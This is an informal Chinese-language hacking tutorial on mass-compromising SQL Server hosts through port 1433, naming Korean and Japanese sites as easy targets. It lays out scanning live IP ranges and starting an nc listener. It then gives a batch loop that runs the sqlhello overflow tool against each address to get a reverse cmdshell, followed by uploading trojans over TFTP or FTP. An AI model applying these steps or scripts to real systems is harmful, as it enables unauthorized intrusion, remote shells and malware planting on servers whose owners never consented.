X-CAN ....等等扫空口令弱口令..像21 23 80 135 139 445 1433 3389 4899 5900...等断口的入侵

但是呢，抓到的鸡事实上质量并不高、所以今天我就教大家抓开着1433端口的站点服务器（韩站的比较好啊 ）

教程用到的工具：
1 可视化+cmd S扫描器[火狐版] 2 nc:用于本机开端口监听 （网络军刀很有名的）
3 sqlhello :1433溢出工具 4 还有自己写的批处理文件

sql-server溢出服务器入侵的教程步骤分类：

1. 在 百度 GOOGLE 等搜索引擎中寻找活跃 的 ，存活的多的主机IP段 （这个很重要啊直接影响扫描的IP的多少还有溢出的结果）

2.利用PING命令，查看返回IP

3.利用扫描器扫描活跃网段 开着1433端口的站点服务器（主机，而且溢出国外的主机是很容易的像日本的韩站的），sql数据库依赖的端口是1433

4.利用nc在本机进行端口监听（端口任意）

5.用sqlhello进行溢出 得到cmdshell权限（内网事实上成功率很低的，无奈）
建立批处理文件

sqlhello的溢出语句
@for /f %%i in (**.txt) do sqlhello %%i ** **.**.**.** 1234
IP文件 访问的IP 本机的IP 本机监听端口
批处理监听语句：

@echo off
@start nc -vv -l -p ***本机监听端口

6.利用得到的cmdshell对该服务器进行上传木马（就是DOS下的传文件方法TFTP FTP COPY 映射盘符）